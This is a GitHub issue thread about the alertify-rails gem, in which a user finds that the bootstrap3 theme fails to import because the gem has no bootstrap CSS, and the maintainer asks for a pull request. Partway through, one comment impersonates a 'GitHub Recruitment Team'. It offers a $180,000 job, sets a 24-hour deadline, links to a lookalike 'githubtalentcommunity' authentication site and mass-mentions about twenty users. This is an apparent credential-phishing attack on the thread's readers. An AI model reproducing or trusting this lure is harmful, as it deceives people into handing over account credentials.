### ISSUE TITLE
loading errors

### ISSUE THREAD

**Issue by AndreLZGava** [rudionrails/alertify-rails#9]
I'm needing to use this @import 'alertify.default'; instead of this @import 'alertify.bootstrap3'; cause if I use boostrap3 it gives errors, and with /theme/bootratp3 too

**Comment by AndreLZGava** [comment]
Errors is always about 

File to import not found or unreadable: alertify.bootstrap3.
File to import not found or unreadable: alertify.themes.bootstrap3.
File to import not found or unreadable: alertify/themes/bootstrap3.
File to import not found or unreadable: alertify/bootstrap3.

Is there another way that this must work with bootstrap3?

**Comment by AndreLZGava** [comment]
Discovered why this don't load bootstrap, there is no bootstrap css in the gem

**Comment by rsmdt** [comment]
Hey, you have a solution for this? Is this issue still applicable?

**Comment by AndreLZGava** [comment]
update your gem with the bootstrap css file on it, I have changed the gem becuse I needed it fast.

**Comment by rsmdt** [comment]
please provide your changes in a pull-request and I'll merge it

**Comment by mepcovenkat97** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
hamzakaya, @ixaxaar, @mw-ding, @Jolly-Walker, @dimchansky, @GustavoGJesus, @emdadul38, @mrmizz, @spcfox, @joekim, @voodee, @hieundx, @mfreeman59, @mhxw, @124t, @CNSumi, @Mutefish0, @Dos-leg, @arguiot, @jerry-curaga

**Comment by ixaxaar** [comment]
why am i getting notifications of this thread? that too, today?! :thinking:
